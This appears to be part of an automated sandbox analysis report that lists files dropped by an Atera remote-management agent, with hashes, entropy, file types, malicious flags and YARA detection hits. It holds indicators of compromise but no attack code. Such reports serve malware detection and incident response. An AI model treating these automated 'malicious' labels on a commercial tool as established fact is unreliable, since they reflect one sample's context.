                                                                                                                                                                                                                                        SHA-512:95877A2E690E083B256F71E376BE757FA0D329A6AAEC193461D325C63867BCE9E72A648EDB17A8817198C5224853541C65F664A6FFB966AE35D9E558F681EF46
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):883760
                                                                                                                                                                                                                                        Entropy (8bit):6.071511091364285
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:m1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQ0:m1n1p9LdRN39aQZUq1
                                                                                                                                                                                                                                        MD5:1A5AE803BFFDEBA6B4D9825233D1C23C
                                                                                                                                                                                                                                        SHA1:E324D9B2F417F46FE3364658429B620BC5942322
                                                                                                                                                                                                                                        SHA-256:2BED7E5890D572E41770C422C25CF11F0D3C2D170C5F38F8EB1535E1A3E614C6
                                                                                                                                                                                                                                        SHA-512:D8DCB1E227AD001A2F43C9847E0A22D43DBE7021814AB88DBD168092A3C172D17CB69848F743166E755DB771B55025664C0E53580B9E48252B1581AD281E332A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):702512
                                                                                                                                                                                                                                        Entropy (8bit):5.943194897994663
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:3f9WGsSVSM2mxL2nRiOr8gUckc6V/g2GhBzj05cH3:vXNL2PVh6B+BzjmcX
                                                                                                                                                                                                                                        MD5:F78DB2C6B247E0FFC215A44AE88178D8
                                                                                                                                                                                                                                        SHA1:12FB14AE1CF731115F07076AD939A2ACC57A9920
                                                                                                                                                                                                                                        SHA-256:1DFF434970F52326AA5E0C1164AB76A771A1EE651E37166DF8A3BC3F06204746
                                                                                                                                                                                                                                        SHA-512:AF3F67FA56CA89111E389DE17F9030D979827E8B60AF86E991115B07759D6DADA1B74ED870B5163474192BF58A5FA69EBFB03DFCF087EB88E1E72EC26BB578CB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):285744
                                                                                                                                                                                                                                        Entropy (8bit):6.190004154231823
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:uZAWecOmop6I4A9YzsRuBeXirS9/pcRykxxNKKV6S8mSrpsPngH:uZeZ6ANRIru9/pcMkoKV64SrWA
                                                                                                                                                                                                                                        MD5:2CD03F275D3BB90B106632F203DCAF64
                                                                                                                                                                                                                                        SHA1:025C716D6B123FA03DC9F97D4BF77D4AF20B75AE
                                                                                                                                                                                                                                        SHA-256:B90619EBE88644BDA995505BDE5D5E282403E27FF7A55E273CC2FF9ACC88300A
                                                                                                                                                                                                                                        SHA-512:321660D33F6126077D4DC04AFBB341B9D46D07E2B38CF45F1C7B2C8B60A58A3F008390EE6F8B6995BECF4B0EADF66C9263D4BE67C8269F9A0851207650B9632D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):284208
                                                                                                                                                                                                                                        Entropy (8bit):6.117448325022863
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:/ZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xH9:Bgo0WPVTXgd
                                                                                                                                                                                                                                        MD5:BF59A9BBF620C0F06ED79180C868FCE0
                                                                                                                                                                                                                                        SHA1:2E8F9EF7A105A951790344A3B9ADC61DB35ABAAD
                                                                                                                                                                                                                                        SHA-256:CEBDB552DAC9E136F87E37A461B7683934F00AA2A74FBA15BC53ADFA38F1B79E
                                                                                                                                                                                                                                        SHA-512:C472376BD7A0E532CB8FDDA7ADDB00FB973D30F97368460929E8352C16BCB17EA92264C81E1E1E084566172ECE3D1513073D24B01990A808335D0C040039C6D3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22064
                                                                                                                                                                                                                                        Entropy (8bit):6.678227546122444
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Xy/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOqq/dW:XuhMaVmzDC67EpYinAMxCwk
                                                                                                                                                                                                                                        MD5:181F16CCEBD4B02ACE42A02CC536ACA9
                                                                                                                                                                                                                                        SHA1:84795DA0255E288C96AC64F1C8150E81E0289FFD
                                                                                                                                                                                                                                        SHA-256:80582DBDE89A6D9906721AD27562C7B2BEDE7048E4D461828D3BA2C4438E58E9
                                                                                                                                                                                                                                        SHA-512:73F93A3F4538FCE421A453B5A90AC662CC58D5A846AFECB8E337F33A1D643A81C8D02F5F3AECAE4CF00828A3103C63614F086E92ABD262317B13CF608784D72A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51760
                                                                                                                                                                                                                                        Entropy (8bit):6.235108733243218
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:bzpj9H0/bvvmNAkkOMo/23e3vggrkrD9Bxjpm2yuIFLlHTUpa/hDXEpYinAMxCWC:bzpjF0/t043e3vggr83jMYa/hU7HxVJU
                                                                                                                                                                                                                                        MD5:30BD9DF0841299E8FA11340B83A441B0
                                                                                                                                                                                                                                        SHA1:36447785062CB3DFDF9A1E03548EFD348760458F
                                                                                                                                                                                                                                        SHA-256:801BB92AA7A8840148FE548ECE4B7291C0E4FA73712FE2497074C925ECC906B9
                                                                                                                                                                                                                                        SHA-512:830B821EE5BF401A6B95662EE191FC8BF08BF64D4D8BFBDB0E142D303AB241C41C4134883C0851B4D5DAF49F598454CE33595787C7084B4F9504794D9B07E54B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):138288
                                                                                                                                                                                                                                        Entropy (8bit):6.179673461309118
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:MP3XFz0qjCIIMAxlUXsKovHO420kN1A6C8Ily:Mh0qjC5RMOHO420kN1Z
                                                                                                                                                                                                                                        MD5:37C069A058DC803C83C43DF6681907DA
                                                                                                                                                                                                                                        SHA1:ED522080452C472560A74F4B979BDC5CFE1643E7
                                                                                                                                                                                                                                        SHA-256:9CD89ED91343ABF19DEF9EE1809AC28765EB3D63E5597583D3D183156D8B3C62
                                                                                                                                                                                                                                        SHA-512:1F38E4153FBFF9C996C3348A325AC3E9B43118D97F5E51B1099D09C61BFC4D772ADE110603D479403317AD76AD42F494E55A58E278F825EFBFA6E1ABEE246929
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17968
                                                                                                                                                                                                                                        Entropy (8bit):6.674524887219165
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Hh06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeBr882HW:Hy9eEpYinAMxCAT2HW
                                                                                                                                                                                                                                        MD5:3D126403FBA7BC6FAC6E6ABF5FCE09E8
                                                                                                                                                                                                                                        SHA1:70B60D649EB174C109C0A6DC873444473D956694
                                                                                                                                                                                                                                        SHA-256:D2B815734C2683E7759DEEA3019FCD2B19F5B879CFA3BA02620619DBCAF73E38
                                                                                                                                                                                                                                        SHA-512:BC0D56E79471051228DB678AC686BE96BEA6697C2376AE28574EDBAD52CF827AE720A7F733B6FE96B2757610771137B6E6A6CF86B787128136D17B232F09569D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27184
                                                                                                                                                                                                                                        Entropy (8bit):6.335679732582514
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Qn1VM0JrpNWDcIh6leOiDFIFBYp1+/EpYinAMxCF:QnvXYcIh6yFIFBYpc47HxG
                                                                                                                                                                                                                                        MD5:14C4B9D7E63166E65ECCD9A74A55BC4A
                                                                                                                                                                                                                                        SHA1:C1F849748FBC76EC9BF9BF934135860242CE1928
                                                                                                                                                                                                                                        SHA-256:83BBFBEDA8EFB1745ECDDBEE0FB16ECAE1E6524461FE075B90C700E34C78498F
                                                                                                                                                                                                                                        SHA-512:C2774C72B62148FFFF05B2714F4720D212F52F740812D307D683D66709D77FD06F325A4DB25D952B9B2CCA5A1DD60CEDFCBFB6420FA5CE1A81B9D711395671A1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):73264
                                                                                                                                                                                                                                        Entropy (8bit):5.95485496879401
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRY:67N1r9KGI04CCARLY
                                                                                                                                                                                                                                        MD5:B742B57BE990E57E0D079CFAF918E086
                                                                                                                                                                                                                                        SHA1:00652CB0AD4ABCE039397AF2308B2D6D251A2B09
                                                                                                                                                                                                                                        SHA-256:8929394DD35DBF2592AAE46E1063D38D782122F2A7F6A0248A754817E4394823
                                                                                                                                                                                                                                        SHA-512:2CD15A7F0626AD3BBA10431AEEFEDE1A195987BA609EC01A51083EEEF11DA516FF4D0678451372106A27A66E013A1012FB00E74CB4F4125C7F451559DE326908
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3585011
                                                                                                                                                                                                                                        Entropy (8bit):7.9999193745697
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:PifnPfXNZMNdg2I1fVkjUhN0ToFwQGw8tQRSm90p13l95Ogl5xs35F7gzzTaCzZw:PSPfadg2IIj+N0TK7SSKjUglopWD/Py
                                                                                                                                                                                                                                        MD5:25EE719E8A32A0C5DFC57A5923FE32F2
                                                                                                                                                                                                                                        SHA1:F48E0549F5F05476EB780E78F7840A98B4375193
                                                                                                                                                                                                                                        SHA-256:A5CEB8392D19691CFC565D6DE595D829D474B9B095557A55C1D11BA475E82836
                                                                                                                                                                                                                                        SHA-512:A7483CDD47E71AE7570AFF30D2EC9E8017DFE5BA6488A8E14B538912A0E3AB286BAF764A13553D30170D874C5F14EA524C5D878131304C74838AA8E0952A2831
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):396336
                                                                                                                                                                                                                                        Entropy (8bit):6.250697507262227
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:1fXwAmmWkxZjUCyC6ulqODyu+1QsF9K7SCHp5ZuI5MXd0XjkcdvCtUovOz6E8DnB:1fX7bwG6ulqJZaS5kzdKtUYOzMu2h
                                                                                                                                                                                                                                        MD5:B50005A1A62AFA85240D1F65165856EB
                                                                                                                                                                                                                                        SHA1:EEC370FA998AFCD06227DCB1BD5E6E2D36073693
                                                                                                                                                                                                                                        SHA-256:1867CF4FCB38F7E7FC98DDAD180C26A717360DF688A8EABD9F325FDE3C16F5BD
                                                                                                                                                                                                                                        SHA-512:63E664A8C12F27EF4C273330A8CE322CEACF12649C2BF61617ED8E394C43BF2CCAF1C2A14E2CE8807C11CE5EDD653FC7F942D0F4919923B37E1174A67393DBC4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1459
                                                                                                                                                                                                                                        Entropy (8bit):5.033662307409642
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:2dErdGPF7Nv+13vH2/nVhOXrRH2/d9XF7N0PH2/+w39XF7NQ7uH2/F9y:cErU7h+1/gn27Rgdz7Eg+w3z76agFw
                                                                                                                                                                                                                                        MD5:C6ECF24757926EBA64E674BFF8B747D1
                                                                                                                                                                                                                                        SHA1:3A46083826C20E8E085C42BBFDFEEF4F9E2B90D9
                                                                                                                                                                                                                                        SHA-256:C3EC04142C15B0A237E72CE1C3C85D19CD1231B9824F7A9854E7909A74B7BECC
                                                                                                                                                                                                                                        SHA-512:EFABB9883ADB098A90115E8938C92B76BBB8D2EB5DE170ECFA205EE949A2D722E0F97F6E01F9A71AC8B5FA2108B9FF82FA0171759D50E30D0AB5FC1948BDCE15
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.9.1.0" newVersion="2.9.1.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhW8:W9
                                                                                                                                                                                                                                        MD5:72133F8B7A6B747D14AD3D4BFF8CA002
                                                                                                                                                                                                                                        SHA1:476623D1CA063E5F7836DEC97384F79E9DD04786
                                                                                                                                                                                                                                        SHA-256:531EFE3FB7CACBC23B12FBEF7B426A3EEF4B4ACA64C20DF7637F4ABD46CF1FC1
                                                                                                                                                                                                                                        SHA-512:4292C7513F4843543FDDA960271E060648C7690AB48477FCE27C00220F5216FC813114078E64886AADCDD5FD42AD96DB447856C11FD5954D6B1596B744CD5F2C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=36.9
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):102448
                                                                                                                                                                                                                                        Entropy (8bit):6.190419076161021
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:OPAt6+FT+ZGodV5iYbYSWd85e+ZS5sSak42QhLks2OL87Hxc:O2bYbYSWd85I5sSakFQhHL8G
                                                                                                                                                                                                                                        MD5:F64F56F2E4DFA797D5CB4B1CBA08644C
                                                                                                                                                                                                                                        SHA1:3C2DCA64758145239E2AEF45E05CCF6BF9A7FB8D
                                                                                                                                                                                                                                        SHA-256:F23BBB31DD11D74343840FF81E37F73FB891DE7E8C6596AEED2C405DBA97CFA0
                                                                                                                                                                                                                                        SHA-512:19181FCF32B176E9D24677DF8D740D5226F5A7D044DFB24725645C951F4F7682D9CA521F62E2420C814EF177BD20F0C470B54D1C710713F75ECC7F58F7C30CCA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):95280
                                                                                                                                                                                                                                        Entropy (8bit):5.996740439887868
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:t4aRSNSrXS5EaKoDMsUVl0HAWMco2bJkj87HxsN:t4auS7S5Ea6WMcpu8I
                                                                                                                                                                                                                                        MD5:EF30D465678A904C773B58CC3B1AD66B
                                                                                                                                                                                                                                        SHA1:D08C5968C279790EF2D10BF2FFC1F2DE937ED4DD
                                                                                                                                                                                                                                        SHA-256:A5FAFA659C8CEC0FF892405939E3BB32269845D4509763ADD219C15E7D2A8710
                                                                                                                                                                                                                                        SHA-512:521E64502F81A789DFB6D4FBE545F76DFE32C7998222CE3002DCEBCE5550D60AF6F29C30F9A4B8B888639CAEDB8C718BA34D88BCCA782EF13E8CE3A81ED537BD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):75312
                                                                                                                                                                                                                                        Entropy (8bit):6.240212933460331
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Su2lKxktXgl4icipJNz671/nVYWREDnAvk2jkbukZmyJsldySMcAn9fG1EcfgrY1:fF+qo7mDEwj4NXLGcfgruFcg7HxRv
                                                                                                                                                                                                                                        MD5:E307CE14EC46071E8D18B6E281A4F955
                                                                                                                                                                                                                                        SHA1:2AA8E6FFF7346019682148DCBCEF44F72ECC4982
                                                                                                                                                                                                                                        SHA-256:E1E9378C07B6783755D1CB46115A1791651588BD172BD535630C306198D384A9
                                                                                                                                                                                                                                        SHA-512:2D7A23FF1D4837FA51E9C93FA0FAC0CE4F5C7744DFED28DD87C75CFF550DA121D0383F488316FF056E60C1068F59A3634E0B09D62065271B1773B73E99C54D4F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51760
                                                                                                                                                                                                                                        Entropy (8bit):6.407791203959866
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:GQMnMYPWMXMwtKsSdj3xn91SPSvwzE8Kku6P3A+wf+bMEpYinAMxCkU:G9MYPJS/16/E8/3A+++bF7Hx3U
                                                                                                                                                                                                                                        MD5:A36553BAC1F9CBF5ECBC13F7BB830E7B
                                                                                                                                                                                                                                        SHA1:2BDACF2F0FD7ED5F3E62E4888F0A9034E8882BFE
                                                                                                                                                                                                                                        SHA-256:CC527E9A3E527C9907D1AA00564057D070BA9B269B9FB2AD8D0F3DD380CBD3B4
                                                                                                                                                                                                                                        SHA-512:9B3CD927725CCA3B2159F91406EF472506348BDB9CF1066386E1DAD1E9C2C4F4A72BF7A936AC9694F259C9F73AFB71B1CC37F9B5C0B1FF3D0259D1B9BD3214B1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):155184
                                                                                                                                                                                                                                        Entropy (8bit):6.247738832262604
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:T0feG0EI+t80zE04kjSnY2QJ6lwZaBsEFmWF+Ykt:IP80zukOltwWk
                                                                                                                                                                                                                                        MD5:CE4E3B687617A7C94D73539DCD89FA73
                                                                                                                                                                                                                                        SHA1:4C6519693D081D9F03503AA5CA3312C41DA3F981
                                                                                                                                                                                                                                        SHA-256:DF753760463622BBF573AD25AC4B5184727D1F232FF68A17A1601F39377DBB76
                                                                                                                                                                                                                                        SHA-512:FA0C76247E05C1577B767373DA659A4876B3B39DA20D3D0CE8A73779306C66FD3A2A032DCD47D11A79F1A1A2A93E242651F8650934CFB98C10D4E50F111F8F90
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):215088
                                                                                                                                                                                                                                        Entropy (8bit):6.03083318319815
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:m1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7sV:5Izm6pOIgvr7s
                                                                                                                                                                                                                                        MD5:A58985E020BB24EB28C965043EFBA9F5
                                                                                                                                                                                                                                        SHA1:709CB8780E30484A788EF6EADB8B76D30491F66C
                                                                                                                                                                                                                                        SHA-256:1AAED0562F7379F1998E50A9C0F8CBCFCFEE65FF2EF3C5DE2ACCD56764418385
                                                                                                                                                                                                                                        SHA-512:291CBFB3A468DA06CAA0D02B04CE5109EA3EEBDD1B4B0918D9AE45B7DB9FBEAE6842B35D4C9DF99373CAF54DFBED714577C959BE2C9DD9AA92FE2774860842C8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                        MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                                                                                                                                                        SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                                                                                                                                                        SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                                                                                                                                                        SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:{}
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):354352
                                                                                                                                                                                                                                        Entropy (8bit):6.153514122272104
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:+r/iEF3zTxesPlx5zIAUH+2n8G4smIkuxhnCq7a/ZmvYy:+hpp9xxIBeXGfvYy
                                                                                                                                                                                                                                        MD5:B2F1B38E6DFFE1FE761A0865392161ED
                                                                                                                                                                                                                                        SHA1:D9196465705125A228494A28D5CE3F3F2C7BDB36
                                                                                                                                                                                                                                        SHA-256:8E958FEA067350A1957FC9E4F3052A1B8D28AB95D4E26A072BCEF0794FB8A398
                                                                                                                                                                                                                                        SHA-512:6E4B6BB945EF698F4552E229E6CBBB615060722D2D1E8F5877200C37C4EEC8AD683C61DA701CB9A09C79673ECA96AC8CAFC3FDF70BACD2C5507C4F0ED78BC1E1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):883760
                                                                                                                                                                                                                                        Entropy (8bit):6.071481963565208
                                                                                                                                                                                                                                        Encrypted:false
